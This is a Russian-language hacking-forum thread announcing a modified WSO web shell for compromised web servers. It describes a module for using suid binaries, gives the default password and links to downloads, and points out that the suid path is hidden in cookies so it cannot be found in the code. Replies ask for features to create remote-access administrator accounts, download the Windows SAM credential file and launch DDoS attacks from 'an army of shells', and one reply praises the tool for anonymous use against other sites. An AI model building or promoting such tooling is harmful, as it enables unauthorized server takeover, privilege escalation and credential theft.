Небезизвестный шелл WSO с добавлением модуля для работы с Suid'никами.

Модификация изначально писалась под собственные нужды, но решил её выложить, так как данная модификация может пригодиться другим пользователям.

На данный момент большинство пользуется этой наработкой: http://cyberguru007.blogspot.com/2011/07/wso.html

Но в ней очень много больших минусов .

Модификация:

• Шелл находиться исключительно в одном файле, не требуется создание нескольких файлов.
  
• Путь к Suid'нику и пароль к нему не прописан в файле - его можно указать прямо в шелле и менять не модифицируя исходный код.
  
• Вся необходимая информация храниться в COOKIE, при просмотре коде невозможно определить местоположение суидника.
  
• Шелл защищён паролем - после ввода пароля вы получаете обычный доступ, суидник нужно указать отдельно.
  
• Исправлены глюки при Upload'е, изменении настроек - теперь можно загружать файлы, менять кодировку, AJAX режим можно не переключаюсь к обычной работе.
  
• Присутствует возможность проверки работоспособности суидника до подключения шелла.
  
• Передача данных происходит через встроенную функцию wsoEx.

Скрин:

http://i045.radikal.ru/1108/75/cbbac301dabd.png

http://s51.radikal.ru/i132/1108/30/85c6f414daa8.png

Данная утилита предоставляет веб-интерфейс для удаленной работы c операционной системой и ее службами/демонами.

Использование данного продукта в незаконных целях грозит уголовной ответственностью.

Код в аттаче . Модификация писалась для личного использования, что возможны глюки.

Пароль - root.

Сделай еще в запакованном виде

имхо и без этого можно было обойтись, просто немного модифицируя wsoEx

хотя, посмотрим..

любой труд нужно оценить

Скачать запакованную версию: http://zalil.ru/31520955

Если кому то нужно добавить ещё некоторые возможности - пишите, сделаю.

UDP:

Под рукой нет винды

сделай поддержку WIN

вкладку, где элементарным нажатием клавиши, можно было создать админа с правами на удаленное подключение.

кнопку на скачивание SAM файла

и т.п. для ВЫНей.

чтобы уже совсем облениться и не писать вручную net user /ADD =)))))))

отправка GET/POST запросов, с поправкой хидера

реализовать думаю лучше через сокеты, не везде есть курл

как суидник добавлять?

Например DDOS из армии шеллов)))

А так вещь вообще действительно полезная, например для анонимной работы с дырами на других сайтах и тд...

я вот тока заметил

а что означает слово Modificed?

есть слова Modified, и Modificated

а вот чо значит modificed, я не понял

Дополню: Шелл должен иметь как можно больше возможностей, и в тоже время иметь компактный размер. добавлять всё что не попадает под эту категорию не надо.

Всё что считаю нужным добавлю как будет время.

Тема перенесена в Уязвимости по моей просьбе.